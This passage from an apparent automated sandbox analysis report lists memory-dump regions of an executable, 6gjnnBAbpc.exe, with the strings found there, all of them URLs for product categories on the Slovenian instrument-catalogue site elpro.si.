00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/mollet-molosc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/naprave-za-tl
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/nivojska-stik
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/zvezni-meriln
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-nivojno-ohisje
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-prikazovalniki
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/dodatki-za-merilce-ni
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/opticna-stikala-nivoj
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/plavajoca-stikala/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/potopni-hidrostaticni
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/prikazovalniki-nivoja
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/zvezno-merjenje-nivoj
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-ph-co2-prevodnosti-vakuuma-vsebnosti-soli-kvalitet
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/digitalni-manometri/
